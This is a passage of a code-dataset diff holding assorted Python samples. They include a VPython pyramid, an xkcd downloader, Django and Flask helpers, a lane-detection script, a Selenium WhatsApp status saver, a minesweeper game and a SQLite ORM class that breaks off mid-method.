diff --git "a/2195.jsonl" "b/2195.jsonl" new file mode 100644--- /dev/null +++ "b/2195.jsonl" @@ -0,0 +1,544 @@ +{"seq_id":"304289132","text":"#!/usr/bin/env python3\n#\nfrom vpython import *\n#\nscene.title='Octagonal Pyramid'\nscene.width=1000\nscene.height=600\nscene.background=vector(1,1,1)\ndistant_light(direction=vec(1,2,1),color=vec(0.8,0.8,0.8))\ndistant_light(direction=vec(1,-2,1),color=vec(0.8,0.8,0.8))\n#\ncol=vector(0.7,0.4,0)\npz=[]\npx=[]\ntria=[]\nalpha=pi/4\nyy=-1\nfor i in range(8):\n beta=i*alpha\n zz=cos(beta)\n xx=sin(beta)\n pz.append(zz)\n px.append(xx)\nc=vertex(pos=vec(0,1.5,0),color=col)\nd=vertex(pos=vec(0,-1,0),color=col)\nd.normal=vec(0,-1,0)\nfor i in range(8):\n j=(i+1)%8\n al=vertex(pos=vec(px[i],yy,pz[i]),color=col)\n ab=vertex(pos=vec(px[i],yy,pz[i]),color=col)\n bl=vertex(pos=vec(px[j],yy,pz[j]),color=col)\n bb=vertex(pos=vec(px[j],yy,pz[j]),color=col)\n ab.normal=vec(0,-1,0)\n bb.normal=vec(0,-1,0)\n trb=triangle(v0=ab,v1=bb,v2=d)\n lnorm=((bl.pos-al.pos).cross(c.pos-bl.pos)).norm()\n al.normal=lnorm\n bl.normal=lnorm\n c.normal=lnorm\n trl=triangle(v0=al,v1=bl,v2=c)\n tria.append(trl)\n tria.append(trb)\n\n\n\n\n\n","sub_path":"olp_sem6/OtherPrograms/OctaPyram.py","file_name":"OctaPyram.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"514149998","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# 演習プロジェクト 15.12.2 \r\n# downloadXkcd2.py - XKCDコミックをひとつずつダウンロードする\r\n# ただし、前回の差分のみをダウンロードし、\r\n# デスクトップにもコピーする。\r\n\r\nimport requests, os, bs4\r\nimport time\r\nimport shutil\r\n\r\ndesktop = 'C:/Users/YOUR_ID/Desktop' # デスクトップのパスを指定してください\r\n\r\nurl = 'http://xkcd.com/' # 開始URL\r\nos.makedirs('xkcd', exist_ok=True) # ./xkcdに保存する\r\n\r\nwhile not url.endswith('#'):\r\n # ページをダウンロードする\r\n print('ページをダウンロード中 {}...'.format(url))\r\n res = requests.get(url)\r\n res.raise_for_status()\r\n\r\n soup = bs4.BeautifulSoup(res.text, \"lxml\")\r\n\r\n # コミック画像のURLを見つける\r\n comic_elem = soup.select('#comic img')\r\n if comic_elem == []:\r\n print('コミック画像が見つかりませんでした。')\r\n else:\r\n comic_url = 'http:' + comic_elem[0].get('src')\r\n filename = os.path.join('xkcd', os.path.basename(comic_url))\r\n # ファイルが存在しない場合に限り、ダウンロードする\r\n if not os.path.exists(filename):\r\n # 画像をダウンロードする\r\n print('画像をダウンロード中 {}...'.format(comic_url))\r\n res = requests.get(comic_url)\r\n res.raise_for_status()\r\n\r\n # 画像を./xkcdに保存する\r\n image_file = open(filename, 'wb')\r\n for chunk in res.iter_content(100000):\r\n image_file.write(chunk)\r\n image_file.close()\r\n\r\n # デスクトップにコピーする\r\n shutil.copy(filename, desktop)\r\n\r\n # PrevボタンのURLを取得する\r\n prev_link = soup.select('a[rel=\"prev\"]')[0]\r\n url = 'http://xkcd.com' + prev_link.get('href')\r\n\r\n time.sleep(20)\r\n\r\nprint('完了')\r\n","sub_path":"practice_pj/practice_projects/ch15/downloadXkcd2.py","file_name":"downloadXkcd2.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"108298418","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nclass Student(object):\n\n @property # @property 使得 sname 变成了属性\n def sname(self):\n return self._name\n\n @sname.setter # 注意这里是 sname.setter 而不是 property.setter\n def sname(self,value): # 这里也叫 sname 但调用的时候,赋值才调用本函数\n self._name = value\n\n\ns1 = Student()\ns1.sname = \"zhangsan\"\n\ns2 = Student()\ns2.sname = \"lisi\"\n\nprint(s1.sname)\nprint(s2.sname)\n","sub_path":"oop/demo2/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"27980579","text":"import json\n\nfrom django.db.models import Max, Min\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom datetime import timedelta\n\n# Create your views here.\nfrom sale.models import Invoice\n\n\ndef sales_ajax(request):\n if request.is_ajax():\n last_date = Invoice.objects.all().aggregate(Max('created_at'))['created_at__max']\n start_date = Invoice.objects.all().aggregate(Min('created_at'))['created_at__min']\n days = []\n sales = []\n counter = 1\n moving_date = start_date\n while moving_date <= last_date:\n present_date = moving_date\n moving_date = moving_date + timedelta(days=1)\n invoices = Invoice.objects.filter(created_at__gte=present_date, created_at__lt=moving_date)\n sum = 0\n for invoice in invoices:\n sum += invoice.paid_amount\n sales.append(sum)\n days.append(str(present_date))\n data = json.dumps({'dates': days, 'sales': sales})\n return HttpResponse(data, content_type='application/json; charset=utf8')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"592400578","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\n\n############################################\nprint('Current dir: ' + os.getcwd())\ntest_img_fn = 'whiteCarLaneSwitch.jpg'\nimage = mpimg.imread('test_images/' + test_img_fn)\n\nprint('This image is :', type(image),\n'with dimensions (height, width, color depth): ', image.shape)\nysize, xsize = image.shape[0], image.shape[1]\n\n############################################\ndef region_of_interest_img(img):\n # create a 'region of interest' mask\n region_img = np.copy(img)\n not_region_img = np.copy(img)\n # select 3 points on the image at the vertices of the region of interest\n # point = [x, y] coordinates in the image\n # image is 960 x 540 (width x height), using image coordinate system\n left1 = [450, 300]\n left2 = [100, 539]\n top1 = [0, 325]\n top2 = [959, 325]\n right1 = [0, 0]\n right2 = [959, 539]\n\n # fit lines to identify a 3 sided region of interest\n poly_degree = 1\n\n fit_left = np.polyfit((left1[0], left2[0]), (left1[1], left2[1]), poly_degree)\n fit_top = np.polyfit((top1[0], top2[0]), (top1[1], top2[1]), poly_degree)\n fit_right = np.polyfit((right1[0], right2[0]), (right1[1], right2[1]), poly_degree)\n\n XX, YY = np.meshgrid(np.arange(0, xsize), np.arange(0, ysize))\n\n left_edge = (YY < (XX*fit_left[0] + fit_left[1]))\n top_edge = (YY < (XX*fit_top[0] + fit_top[1]))\n right_edge = (YY < (XX*fit_right[0] + fit_right[1]))\n\n # pixels outside the region of interest are set to black\n region_thresholds = top_edge\n region_img[region_thresholds] = [0, 0, 0]\n region_thresholds = left_edge\n region_img[region_thresholds] = [0, 0, 0]\n region_thresholds = right_edge\n region_img[region_thresholds] = [0, 0, 0]\n\n # pixels inside the region of interest are set to black\n region_thresholds = top_edge\n not_region_img[~top_edge & ~left_edge & ~right_edge] = [0, 0, 0]\n\n return region_img, not_region_img\n\ndef color_threshold_img(img, red_threshold, green_threshold, blue_threshold):\n color_threshold_img = np.copy(img)\n\n # set thresholds\n rgb_threshold = [red_threshold, green_threshold, blue_threshold]\n\n # create a mask that sets pixels to red if the value is greater than any of the thresholds\n color_thresholds = (img[:, :, 0] > rgb_threshold[0]) \\\n | (img[:, :, 1] > rgb_threshold[1]) \\\n | (img[:, :, 2] > rgb_threshold[2])\n\n # color_threshold_img[color_thresholds] = [0, 0, 0]\n color_threshold_img[color_thresholds] = [255, 0, 0]\n return color_threshold_img\n\n############################################\nregion_img, not_region_img = region_of_interest_img(image)\nprocessed_img = color_threshold_img(region_img, 175, 175, 175)\nplt.imshow(processed_img)\nplt.show()\n\ncombined_img = cv2.addWeighted(processed_img, 1.0, not_region_img, 1.0, 0)\n\nplt.imshow(combined_img)\n# plt.show()\nfn = test_img_fn\nplt.savefig('./output_images/basic/' + test_img_fn, dpi = 300)\n\n\n","sub_path":"src/simple-lane-lines/lane_line_basic_images.py","file_name":"lane_line_basic_images.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"498804440","text":"import requests\nimport urllib.parse\n\nfrom flask import redirect, render_template, request, session\nfrom functools import wraps\nfrom operator import itemgetter\n\n\ndef apology(message, code=400):\n \"\"\"Render message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/1.0/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return decorated_function\n\ndef is_valid_mail(email):\n #simple and easy checking only for some formatting elements, not checking smtps regexes\n\n atPos = email.find(\"@\")\n\n if atPos > 0 and atPos < len(email) - 2:\n\n if email.count(\"@\") > 1:\n return False\n\n else:\n return True\n\n else:\n return False\n\ndef get_hours(startend):\n #generates a list of strings of time_labels of half ours for input select menu\n hours = []\n\n if startend == \"start\" or startend == \"end\":\n\n for i in range(24):\n hours.append(f\"{i:02d}\"+\":00\")\n hours.append(f\"{i:02d}\"+\":30\")\n\n if startend == \"end\":\n hours.pop(0)\n hours.append(\"24:00\")\n\n return hours\n\ndef schedule_mapper(schedule):\n #maps the schedule from a dict to a list, where a list element's index corresponds to html table cells\n #converts the sql data and create a list of 48 elements corresponding to 48 segments of half ours\n myList = [None] * 48\n\n if not schedule:\n return myList\n\n for elements in schedule:\n startpos = elements[\"start\"]\n\n endpos = elements[\"end\"]\n\n dif = endpos - startpos\n\n myList[startpos] = elements[\"title\"]\n\n if dif > 1:\n for i in range(1, dif):\n myList[startpos + i] = \"-\"\n\n return myList\n\ndef lod_sorter(lod, sortingValue):\n #sorts a list of dict(lod) on a string keyword provided(sortingValue)\n newList = []\n\n if not lod or not sortingValue:\n return newList\n\n newList = sorted(lod, key = itemgetter(sortingValue))\n\n return newList\n\n\n\n\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"286953962","text":"import tkinter\n# aprendendo a usar message\nroot = tkinter.Tk()\nroot.title(\"Aplicação\")\nroot.geometry('400x300')\n# criando a Message\nt = tkinter.Message(root, text='Esse é o texto do widget message.', width=200)\nt.grid()\n\nroot.mainloop()","sub_path":"tkinter/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"114470829","text":"from library.crud.scheme_validator import SchemeObject, SchemeString, SchemeBoolean, SchemeList, SchemeNumber\nfrom scheme.several import SCHEME_HEADER\n\nSCHEME_POLICIES = SchemeObject(\n required=True,\n dict_pairs={\n 'version': SchemeString(True, '\\d\\.\\d\\.\\d'),\n 'active': SchemeBoolean(True),\n 'comments': SchemeString(False),\n 'hash': SchemeString(True),\n }\n)\n\nSCHEME_POLICIES_ACCEPT = SchemeObject(\n required=True,\n dict_pairs={\n 'name': SchemeString(True, '.+'),\n 'headers': SchemeList(True, SCHEME_HEADER),\n 'version': SchemeString(True, '\\d\\.\\d\\.\\d'),\n 'accepted': SchemeBoolean(True),\n 'read': SchemeBoolean(True),\n 'seconds_to_read': SchemeNumber(True, False)\n }\n)\n","sub_path":"backend_apps/scheme/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"338370399","text":"import snap\nimport matplotlib.pyplot as plt\n\ndef loadGraph():\n\tG1 = snap.LoadEdgeList(snap.PUNGraph, \"/home/hieu/data/ttpt/project/facebook_large/musae_facebook_edges.csv\", 0, 1, ',')\n\tsnap.DelSelfEdges(G1)\n\treturn G1\n\ndef CNM_Graph(G1):\n\tCmtyV = snap.TCnComV()\n\tmodularity = snap.CommunityCNM(G1, CmtyV)\n\tcount = 0\n\tsizes = []\n\tcommunities = []\n\tfor Cmty in CmtyV:\n\t listcmty = []\n\t for NI in Cmty:\n\t listcmty.append(NI)\n\n\t communities.append(listcmty)\n\t count += 1\n\t sizes.append(len(listcmty))\n\n\treturn sizes, communities , modularity, count\n\n# plot histogram of community sizes\ndef plot_community(sizes):\n\tsizes.sort()\n\tplt.hist(sizes, log=True)\n\tplt.xlabel(\"Size of community\")\n\tplt.ylabel(\"Number of communities\")\n\tplt.title(\"Sizes of CNM communities\")\n\tplt.show()\n\tplt.savefig(\"cnm-sizes.png\")\n\t\nif __name__ == '__main__':\n\tG1 = loadGraph()\n\tsizes, communities, modularity, count = CNM_Graph(G1)\n\tplot_community(sizes)\n\n\tprint(\"Number of communities:\", count)\n\tprint(\"Largest community:\", max(sizes))\n\tprint(\"Smallest community:\", min(sizes))\n\tprint(\"The modularity of the network is %f\" % modularity)\n\n# Number of communities: 153\n# Largest community: 4487\n# Smallest community: 2\n# The modularity of the network is 0.729481\n","sub_path":"CNM.py","file_name":"CNM.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"283576138","text":"#ex3_1\n# Enter Hours:45\n# Enter Rate: 10\n# pay: 475.0\nThours=int(input('Enter Total Hours: '))\nTrate=int(input('Enter Your Hourly Pay Rate: '))\nRegHours=40\nif Thours > RegHours:\n\tpaycomputation=((Thours-RegHours)*.5*Trate)+(Thours*Trate)\nelse: \n\tpaycomputation=Thours*Trate\nprint(paycomputation)\n\t\n","sub_path":"ex3_1.py","file_name":"ex3_1.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"28020297","text":"# splitter\n# Created by JKChang\n# 12/01/2018, 13:13\n# Tag:\n# Description:\n\n# email = []\n# psw = []\n# with open('/Users/jkchang/Desktop/email.txt') as file:\n# lines = file.readlines()\n# for line in lines:\n# res = line.strip().split('----')\n# email.append(res[0])\n# psw.append(res[1])\n#\n# print('\\n'.join(email))\n\n\ncode = []\n\npsw = []\ns = 0\nlinecount = 0\nwith open('/Users/jkchang/Desktop/codes.txt') as file:\n lines = file.readlines()\n for line in lines:\n linecount += 1\n res = line.strip().split(' ')\n code.append(res[0] + res[1])\n psw.append(res[2])\n s += int(res[0])\n if (linecount % 10 == 0):\n code.append(' ')\n psw.append(' ')\n\nprint('\\n'.join(code))\nprint('\\n'.join(psw))\nprint(s)\n","sub_path":"CJK/temp/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"321078837","text":"import minesweeper as ms\nimport sys\nimport config\n\n\ndef launch(width, height, bombs):\n \"\"\"\n launch the game\n :param width: width of the game\n :type width: int\n :param height: height of the game\n :type height: int\n :param bombs: number of bombs\n :type bombs: int\n \"\"\"\n game = ms.make_game(width, height, bombs)\n state = ms.get_state(game)\n while state == ms.GameState.running:\n try:\n display_game(game)\n play(game)\n state = ms.get_state(game)\n except KeyboardInterrupt:\n sys.exit()\n display_game(game)\n if state == ms.GameState.losing:\n print(\"You lose!\")\n elif state == ms.GameState.wining:\n print(\"You win!\")\n else:\n print(\"an unexpected error has occured\")\n\n\ndef play(game):\n \"\"\"\n require action to the player and execute it\n :param game: game\n :type game: a minesweeper game\n :return: None\n :rtype: NoneType\n :UC: none\n \"\"\"\n action = keyboard_input(game)\n x = action[0]\n y = action[1]\n a = action[2]\n if a == 'R':\n ms.reveal_cell(game, x, y)\n elif a == 'S':\n cell = ms.get_cell(game, x, y)\n ms.set_flag(cell)\n elif a == 'U':\n cell = ms.get_cell(game, x, y)\n ms.unset_flag(cell)\n\n\ndef keyboard_input(game):\n \"\"\"\n :param game: game\n :type game: a minesweeper game\n :return: the player input action\n :rtype: tuple of the action (posX, posY, action)\n :UC: none\n \"\"\"\n try:\n data_in = input(\"Your play x,y,C with x=line, y=row, C=(R)eval,(S)et flag,(U)nset flag): \")\n ldata = data_in.split(',')\n x = int(ldata[0])\n y = int(ldata[1])\n c = ldata[2].upper()\n if x < 0 or x >= ms.get_height(game) \\\n or y < 0 or y >= ms.get_width(game)\\\n or c not in ['R', 'S', 'U']:\n raise ValueError\n return (x, y, c)\n except IndexError:\n print ('There must be two numbers and one letter separated by a comma (,)')\n keyboard_input(game)\n except TypeError:\n print ('There must be two numbers and one letter separated by a comma (,)')\n keyboard_input(game)\n except ValueError:\n print (\"x and y must be integers and c must be R or S or U\")\n keyboard_input(game)\n\n\ndef display_game(game):\n \"\"\"\n display the game in stdout\n :param game: game\n :type game: a minesweeper game\n :return: None\n :rType: NoneType\n :UC: none\n \"\"\"\n height = ms.get_height(game)\n width = ms.get_width(game)\n display_line = \"+---\" * width\n display_line += \"+\"\n to_print = \" \"\n for i in range(width - 1):\n to_print += \" \" + str(i)\n to_print += \" \" + str(width - 1) + '\\n'\n for h in range(height):\n to_print += \" \" + display_line + '\\n'\n to_print += str(h)\n for l in range(width):\n character = \" \"\n cell = ms.get_cell(game, h, l)\n if ms.is_revealed(cell):\n if ms.is_bomb(cell):\n character = \"B\"\n else:\n character = ms.number_of_bombs_in_neighborhood(cell)\n elif ms.is_flaged(cell):\n character = \"?\"\n to_print += \" | \" + str(character)\n to_print += \" |\\n\"\n to_print += \" \" + display_line + \"\\n\"\n print(to_print)\n\n\nif __name__ == '__main__':\n try:\n config_file = sys.argv[1]\n except IndexError:\n launch(10, 10, 10)\n else:\n h, w, b = config.rescue_basic_config(config_file)\n launch(w, h, b)\n","sub_path":"src/console_interface.py","file_name":"console_interface.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"272132963","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\n\nfrom functions import write_data_to_file, get_last_timestamp\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--user-data-dir=./User_Data')\ndriver = webdriver.Chrome(\n 'E:\\\\MegaSyncHP\\\\Sync\\\\Code\\\\python\\\\webdriver\\\\chromedriver.exe', chrome_options=options)\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 600)\n\n\ndef get_status():\n\n messages = []\n\n WebDriverWait(driver, 30).until(EC.element_to_be_clickable((\n By.XPATH, '//*[@id=\"side\"]/header/div[2]/div/span/div[1]/div'))).click()\n print(\"Opening Status page...\")\n\n time.sleep(5)\n WebDriverWait(driver, 30).until(EC.element_to_be_clickable((\n By.CLASS_NAME, '_3ko75'))).click()\n\n while True:\n try:\n message = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/span[3]/div/span/div[2]/div/span/div/div/div/div[5]/div/span').text\n\n timestamp_txt = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/span[3]/div/span/div[2]/div/span/div/div/div/div[2]/div[2]/div').text\n\n log = timestamp_txt[-5:] + \"...[\" + message[:25] + \"]\\n\"\n\n write_data_to_file('files/app.log', log)\n write_data_to_file(\n 'files/messages.txt', timestamp_txt[-5:] + \"...\\n\" + message + '\\n\\n')\n\n print(\"Message downloaded.\")\n # Go to next\n driver.find_element_by_class_name('_3THFw').click()\n\n except:\n break\n finally:\n pass\n\n driver.close()\n return messages\n\n\nget_status()\n","sub_path":"Whatsapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"419941113","text":"import logging\nfrom Util import Util\n\n\nclass InferenceValidator:\n cur = None\n\n root = logging.getLogger()\n\n def __init__(self, cur):\n self.cur = cur\n\n def validate(self, ssid, circuits, boundary, voltage_levels):\n num_stations = self.num_stations(circuits)\n logging.info('In total %d stations covered with the inference', num_stations)\n sql = \"select distinct(unnest(get_stations(r.parts))) from planet_osm_rels r, planet_osm_polygon s1\"\n sql += \", planet_osm_polygon s2\" if boundary is not None else \"\"\n sql += \" where s1.osm_id = \" + str(ssid) + \" and s1.power ~ 'substation|station|sub_station' and s1.voltage ~ '\" + voltage_levels + \"' and ARRAY[s1.osm_id]::bigint[] <@ r.parts\"\n if boundary is not None:\n sql += \" and (s2.power ~ 'substation|station|sub_station' and s2.voltage ~ '220000|380000' or s2.power ~ 'generator|plant') and ARRAY[s2.osm_id]::bigint[] <@ r.parts and st_within(s2.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n self.cur.execute(sql)\n result = self.cur.fetchall()\n if not result:\n logging.info('No existing relation found for station %s', str(ssid))\n return None\n not_hit_stations = []\n hits = 0\n for (station,) in result:\n station_hit = False\n for circuit in circuits:\n if station == circuit.members[0].id or station == circuit.members[-1].id:\n hits += 1\n station_hit = True\n break\n if not station_hit:\n not_hit_stations.append(station)\n logging.info('Found %d of %d connected stations to %s', hits, len(result), str(ssid))\n logging.info('Not hit stations: %s', str(not_hit_stations))\n return hits * 1.0 / len(result)\n\n def validate2(self, circuits, stations_dict, boundary, voltage_levels):\n\n logging.info(\"Starting inference validation\")\n sql = \"select distinct(id), get_stations(r.parts), hstore(r.tags)->'voltage' from planet_osm_rels r, planet_osm_polygon s1, planet_osm_polygon s2\"\n sql += \" where (s1.power ~ 'substation|station|sub_station' and s1.voltage ~ '\" + voltage_levels +\"' or s1.power ~ 'generator|plant') and ARRAY[s1.osm_id]::bigint[] <@ r.parts and st_within(s1.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n sql += \" and (s2.power ~ 'substation|station|sub_station' and s2.voltage ~ '\" + voltage_levels + \"' or s2.power ~ 'generator|plant') and ARRAY[s2.osm_id]::bigint[] <@ r.parts and st_within(s2.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n sql += \" and s1.osm_id <> s2.osm_id and hstore(r.tags)->'route'='power'\"\n self.cur.execute(sql)\n result = self.cur.fetchall()\n num_eligible_relations = len(result)\n hits = 0\n not_hit_connections = []\n for (id, station_ids, voltage) in result:\n if voltage is None or int(voltage) < 220000:\n sql = \"select parts from planet_osm_rels where id = \" + str(id)\n self.cur.execute(sql)\n result2 = self.cur.fetchall()\n for (parts,) in result2:\n for part in parts:\n sql = \"select hstore(tags)->'voltage' from planet_osm_ways where id = \" + str(part)\n self.cur.execute(sql)\n result3 = self.cur.fetchall()\n if not result3:\n voltage = None\n continue\n [(part_voltage,)] = result3\n if part_voltage is None:\n voltage = None\n continue\n if ';' not in part_voltage and ',' not in part_voltage and int(part_voltage) >= 220000:\n voltage = part_voltage\n break\n\n if voltage is None:\n logging.debug(\"Could not determine voltage of relation\")\n num_eligible_relations -= 1\n continue\n\n relation_covered = False\n num_hit_p2p_connections = 0\n for circuit in circuits:\n if Util.have_common_voltage(circuit.voltage, voltage):\n station1 = circuit.members[0]\n station1_connected_stations = InferenceValidator.find_connected_stations(stations_dict, voltage, station1.connected_stations[voltage], set([station1.id]))\n index1 = 0\n index2 = index1 + 1\n while index2 < len(station_ids):\n if station_ids[index1] in station1_connected_stations and station_ids[index2] in station1_connected_stations:\n num_hit_p2p_connections += 1\n index1 += 1\n index2 = index1 + 1\n if num_hit_p2p_connections == len(station_ids) - 1:\n relation_covered = True\n break\n if relation_covered:\n hits += 1\n else:\n not_hit_connections.append(id)\n hit_rate = hits * 1.0 / num_eligible_relations\n logging.info('Found %d of %d eligible point-to-point connections (%.2lf)', hits, num_eligible_relations, hit_rate)\n logging.info('Not hit point-to-point connections: %s', str(not_hit_connections))\n\n @staticmethod\n def find_connected_stations(stations, voltage, connected_stations, covered_stations):\n for station_id in connected_stations.difference(covered_stations):\n covered_stations.add(station_id)\n connected_stations.update(InferenceValidator.find_connected_stations(stations, voltage, stations[station_id].connected_stations[voltage], covered_stations))\n return connected_stations\n\n def num_stations(self, circuits):\n stations = set()\n stations.clear()\n for circuit in circuits:\n stations.add(circuit.members[0])\n stations.add(circuit.members[-1])\n return len(stations)","sub_path":"code/InferenceValidator.py","file_name":"InferenceValidator.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"330018450","text":"# -*- coding: utf-8 -*-\n# @Author : DevinYang(pistonyang@gmail.com)\n__all__ = ['LabelSmoothingLoss']\n\nimport torch\nfrom torch import nn\nfrom .functional import smooth_one_hot\n\n\nclass LabelSmoothingLoss(nn.Module):\n \"\"\"This is label smoothing loss function.\n \"\"\"\n\n def __init__(self, classes, smoothing=0.0, dim=-1):\n super(LabelSmoothingLoss, self).__init__()\n self.confidence = 1.0 - smoothing\n self.smoothing = smoothing\n self.cls = classes\n self.dim = dim\n\n def forward(self, pred, target):\n pred = pred.log_softmax(dim=self.dim)\n true_dist = smooth_one_hot(target, self.cls, self.smoothing)\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))\n","sub_path":"torchtoolbox/nn/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"137607119","text":"#!/usr/bin/env python3.4\n# -*- coding: utf-8 -*-\n''' This class is only a model, to use it is necessary to extend it, and add\nthe table proprieties such name, columns, primary keys, etc...\nThe _columns atribute have to be initiated in the __init__(self, connection)\nmethod, and when overwrite this method, is necessary execute the parent init\nfirst:\n parent().__init__(connection)\n'''\n\nimport datetime\nimport copy\n\n\nclass DbTable:\n ''' Basic class ORM like to manage the table objects and data '''\n _table_name = '' # Table name\n _primary = [] # primary key name\n _children_tables = {} # tablename\n _foreigh_keys = {} # {keyname : tablename.collumnname}\n _conn = None\n\n def __init__(self, connection):\n ''' the table object have to receive a conncetion object to be\n initiated '''\n self._columns = {} # {cname: {value:\"\", type: \"\", default:\"\" }}\n # if default = 'AUTO' the column will be autoincrement\n if connection is connection:\n self._conn = connection\n self._queued_to_save = False # if true, not permit to change values\n\n def set_value(self, cname, cvalue):\n ''' table.set_value(field_name, value) - add a value to field '''\n if not self._queued_to_save:\n if cname in self._columns.keys():\n if (isinstance(cvalue, self._columns[cname]['type']) or\n (isinstance(cvalue, int) and\n self._columns[cname]['type'] == bool)):\n self._columns[cname]['value'] = cvalue\n else:\n raise TypeError('Incorrect value type.')\n else:\n raise Exception('The column ' + cname + ' is not found.')\n else:\n raise Exception(\n 'Object queued to save, the values are readonly until save.')\n\n def get_value(self, cname):\n ''' table.get_value(field_name) - return the field value '''\n if cname in self._columns:\n return self._columns[cname]['value']\n return None\n\n def get_values(self, conj_cname):\n ''' '''\n values = {}\n if cname in conj_cname:\n value = self.get_value(cname)\n if value:\n values[cname] = value\n return values\n\n def find(self):\n ''' table.find()\n Does a search in the table and return the first row that match with\n the values in the object values set with\n table.set_value('cname', value) '''\n\n select_query = {}\n for key, value in self._columns.items():\n if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'\n ] or value['value']:\n select_query[key] = value['value']\n cursor = self._select_query(select_query)\n result = cursor.fetchone()\n if result:\n headers = {\n idx: desc[0]\n for idx, desc in enumerate(cursor.description)\n }\n for index, value in enumerate(result):\n self.set_value(headers[index], value)\n return True\n return False\n\n def list(self, query={}):\n ''' table.find({'field_name1':value1, 'field_name2': value2})\n Does a search in the table for the values and populate the return a\n list of table objects '''\n cursor = self._select_query(query)\n object_list = []\n headers = {idx: desc[0] for idx, desc in enumerate(cursor.description)}\n for i, row in enumerate(cursor.fetchall()):\n object_list.append(self.__class__(self._conn))\n for index, value in enumerate(row):\n object_list[i].set_value(headers[index], copy.copy(value))\n return object_list\n\n def save(self):\n ''' Save the values to table '''\n if not self._queued_to_save: # if not queued, lets queue!\n self.queue_to_save()\n self._conn.commit()\n self._queued_to_save = False # commited\n self.find()\n return self.get_value(self._primary[0])\n\n def queue_to_save(self):\n '''Insert os update a table tuple value '''\n columns = []\n values = []\n select_query = {}\n for key, value in self._columns.items():\n if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'\n ] or value['value']:\n columns.append(key)\n values.append(value['value'])\n select_query[key] = value['value']\n\n placeholders = ','.join(['?' for i in range(len(values))])\n\n query = 'INSERT OR REPLACE INTO {table} ({cols}) \\\n VALUES({placeholder})'.format(\n table=self._table_name,\n cols=','.join(columns),\n placeholder=placeholders)\n self._queued_to_save = True\n return self._conn.execute(query, values).lastrowid\n\n def check_table(self):\n ''' Check if table exist, if not, create it '''\n if not self._table_exists():\n self._create_table()\n\n def column_type(self, column_name):\n '''get the type of a collun'''\n if column_name in self._columns.keys():\n return self._columns[column_name]['type']\n return None\n\n def get_last_rowid(self):\n ''' Get the last ROWID of the primary key of the table'''\n query = 'SELECT seq FROM sqlite_sequence WHERE name=?'\n return self._conn.execute(query, [self._table_name]).fetchone()[0]\n\n def 